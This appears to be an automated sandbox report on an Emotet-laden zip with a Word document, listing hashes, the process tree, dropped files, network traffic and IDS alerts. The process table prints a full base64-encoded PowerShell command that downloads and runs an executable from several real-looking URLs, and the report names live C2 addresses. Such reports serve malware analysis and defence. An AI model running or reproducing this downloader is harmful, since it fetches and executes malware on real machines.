File name: | 48c4145a239522bd01ac22b253d479920b1e7c39.zip |
Full analysis: | https://app.any.run/tasks/e44a6ad2-2ef1-445a-8405-457f16814ac6 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 19, 2019, 09:35:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | F9E5A8B9ED4E64BECBBE60E1CB389D7B |
SHA1: | E6088B60494FF2EBAF06910142539DC41D709574 |
SHA256: | F2C87E80C3AD38D12AE6B34B0A13E47028AB8943C580249C7E4E8FD53BB8007E |
SSDEEP: | 3072:HPM1LKz8XcCFjrWX5F9rQegrg25i+xT9fQtzHo/MZ8wPRQ5CY:vMpywjrWX5FZgk34fQt4wJA1 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:19 10:32:01 |
ZipCRC: | 0xea412a4f |
ZipCompressedSize: | 147311 |
ZipUncompressedSize: | 256360 |
ZipFileName: | 48c4145a239522bd01ac22b253d479920b1e7c39 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3564 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\48c4145a239522bd01ac22b253d479920b1e7c39.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3700 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\doc.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3732 | powershell -encod JABSAE0AbwBqAGYAWABFAFUAPQAnAGgAdwBpAF8ATgAyAFIAQgAnADsAJABDAFkAWQBmADIAUgBRADkAIAA9ACAAJwAyADAAOAAnADsAJABXAGkAaABMAFgATwBsAD0AJwBZAHIAZABVAHEAWQBSACcAOwAkAHYAUwBfADAAUwBCAGIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAWQBZAGYAMgBSAFEAOQArACcALgBlAHgAZQAnADsAJABmAE8AcgBOAHcARQBSAD0AJwBPAF8AXwBPAHYAWABIACcAOwAkAE0AagBfAHoAdwBqAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBCAEMATABpAEUAbgB0ADsAJAB2AG0AMwBQAFAATwA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAZQBmAG8AcgB0AHUAbgBhAHQAZQBuAHUAdAByAGkAdABpAG8AbgAuAGMAbwBtAC8AdgB1AHoAcAA0AG8AMgB2AGIALwBoADMALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHIAYQBuAGcAcgBlAGEAbABpAHQAeQAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwB2ADcAcgByADcALwBAAGgAdAB0AHAAcwA6AC8ALwBjAG8AZABlAG4AcABpAGMALgBjAG8AbQAvAHcAYQBuAGQAZQByAHYAbwBnAGUAbAAvADcAMABtAGoAYQA0AC8AQABoAHQAdABwADoALwAvAHAAaQBuAG0AbwB2AGEALgB4AHkAegAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AGkAZABzAHIAYQBxADQANgA4ADUALwBAAGgAdAB0AHAAcwA6AC8ALwBlAGMAYQBtAHAAdQBzAGsAYgBkAHMALgBjAG8AbQAvAHYAbgBnAHAALwB2ADQAMAA1AC8AJwAuACIAUwBgAHAAbABpAFQAIgAoACcAQAAnACkAOwAkAEYAVQBIAEkAZABtAGkAPQAnAFAASwBVADEAawBmAGgAbAAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBqADgAdABwAGkAQgAgAGkAbgAgACQAdgBtADMAUABQAE8AKQB7AHQAcgB5AHsAJABNAGoAXwB6AHcAagAuACIARABPAHcATgBsAGAAbwBBAGQARgBJAGAAbABlACIAKAAkAEUAagA4AHQAcABpAEIALAAgACQAdgBTAF8AMABTAEIAYgApADsAJABMAHcAYwA1AGQAMgBUAHMAPQAnAHcARgBNAHcAdQBLACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAdgBTAF8AMABTAEIAYgApAC4AIgBsAEUAYABOAEcAVABIACIAIAAtAGcAZQAgADIAOAA5ADQANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAVAAiACgAJAB2AFMAXwAwAFMAQgBiACkAOwAkAG0ARgBwAFQASABfAHUAPQAnAFYAZgByAEsAMABPAHEAJwA7AGIAcgBlAGEAawA7ACQAVwBwAFMASwA1ADQATwA9ACcAegBqAEcAYQBEAEsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcABqAGMAVQA2AHUAdwA9ACcASQBpAHcASAAwAEYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3532 | "C:\Users\admin\208.exe" | C:\Users\admin\208.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2828 | "C:\Users\admin\208.exe" | C:\Users\admin\208.exe | — | 208.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2940 | --7522c4b8 | C:\Users\admin\208.exe | — | 208.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3832 | --7522c4b8 | C:\Users\admin\208.exe | 208.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
360 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 208.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2536 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2644 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREAC2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3700 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:F57C4E9ED3B29A11DEF3DFEA2071FA53 | SHA256:711DDFB9C7512A241E617A6215B6F991220F69479B45474980594928BDC938B6 | |||
3564 | WinRAR.exe | C:\Users\admin\Desktop\48c4145a239522bd01ac22b253d479920b1e7c39 | document | |
MD5:681A63D4FA3D6ED4FFE9911A1B27F2DC | SHA256:6FEF8784C06172D05979F764C7F602B271F218FF3C1BF38391666D79B1AA832C | |||
3700 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\doc.doc.LNK | lnk | |
MD5:DF8C0683C027FCA38688971059FFFFEA | SHA256:FC2CEE73A575E6EC9E5F832BAF8CAC8BA6C4791B20F43FA2B1DBE9964CFF73ED | |||
3700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:69DD3A335D33CC783282A53A26233032 | SHA256:885B23823E0C028E339CE62A9DF7ED3ED98C6339C5E429C887DB36B6A68A29BA | |||
3700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C12259E.wmf | wmf | |
MD5:7AD8CEF330C4CEAA57E51EA260D625AB | SHA256:8017C3AF98BC6BDE5C2173E6D922778E67BD67A2F679CC5BF2AD5C5A862E266D | |||
3700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B39C9559.wmf | wmf | |
MD5:CE6D2F19594887E6A3216F3EA6F19157 | SHA256:FC3270CF801462ED384FE1527FE4C317E406602F7AC7366CFA67799ABCDC406E | |||
3700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D52CB8.wmf | wmf | |
MD5:2A9D4B375373A9E67EE4E025D2CE064A | SHA256:4628FAA4E10BCEA641C7B36F61CBA6263E63B67AB41FE6C36CF83DA15472BD0C | |||
3700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A29035C.wmf | wmf | |
MD5:4084D6B0001BC05B43A46E575F2A1978 | SHA256:B95FB5679ED9C9CA33500D4CCBC230653CC58D084AFB2CFCDC2403A0A0A79C6E | |||
3700 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18260B86.wmf | wmf | |
MD5:D6647E006655C6FA6E3C1700B41BE6C9 | SHA256:364970CC3BACA5A790B3CA16526BCEFA524B947AEB64866F942E62B5FC361BFA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3732 | powershell.exe | GET | 200 | 45.76.184.98:80 | http://thefortunatenutrition.com/vuzp4o2vb/h3/ | SG | executable | 376 Kb | malicious |
3432 | easywindow.exe | POST | 200 | 114.79.134.129:443 | http://114.79.134.129:443/splash/prep/ringin/ | IN | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3732 | powershell.exe | 45.76.184.98:80 | thefortunatenutrition.com | Choopa, LLC | SG | suspicious |
3432 | easywindow.exe | 114.79.134.129:443 | — | D-Vois Broadband Pvt Ltd | IN | malicious |
Domain | IP | Reputation |
---|---|---|
thefortunatenutrition.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3732 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3732 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3732 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3432 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3432 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3432 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |